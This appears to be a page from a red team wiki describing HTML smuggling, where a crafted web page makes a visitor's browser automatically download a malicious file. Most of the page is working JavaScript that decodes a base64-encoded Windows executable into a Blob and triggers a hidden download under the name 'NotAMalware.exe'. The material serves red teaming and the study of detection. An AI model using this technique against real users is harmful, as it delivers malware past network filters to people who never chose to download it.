html-smuggling.md (1626B)
1 --- 2 title: "HTML Smuggling" 3 section: "Red Team" 4 sectionSlug: "redteam" 5 sourcePath: "docs/redteam/access/html-smuggling.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/redteam/access/html-smuggling.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # HTML Smuggling 12 13 ## Summary 14 15 - [Description](#description) 16 - [Executable Storage](#executable-storage) 17 18 ## Description 19 20 HTML Smuggling consists of making a user to navigate to our crafted HTML page which automaticaly download our malicious file. 21 22 ## Executable storage 23 24 We can store our payload in a Blob object => JS: `var blob = new Blob([data], {type: 'octet/stream'});` 25 To perform the download, we need to create an Object Url => JS: `var url = window.URL.createObjectURL(blob);` 26 With those two elements, we can create with Javascript our \<a> tag which will be used to download our malicious file: 27 28 ```Javascript 29 var a = document.createElement('a'); 30 document.body.appendChild(a); 31 a.style = 'display: none'; 32 var url = window.URL.createObjectURL(blob); 33 a.href = url; 34 a.download = fileName; 35 a.click(); 36 window.URL.revokeObjectURL(url); 37 ``` 38 39 To store ou payload, we use base64 encoding: 40 41 ```Javascript 42 function base64ToArrayBuffer(base64) { 43 var binary_string = window.atob(base64); 44 var len = binary_string.length; 45 var bytes = new Uint8Array( len ); 46 for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); } 47 return bytes.buffer; 48 } 49 50 var file ='TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAA... 51 var data = base64ToArrayBuffer(file); 52 var blob = new Blob([data], {type: 'octet/stream'}); 53 var fileName = 'NotAMalware.exe'; 54 ```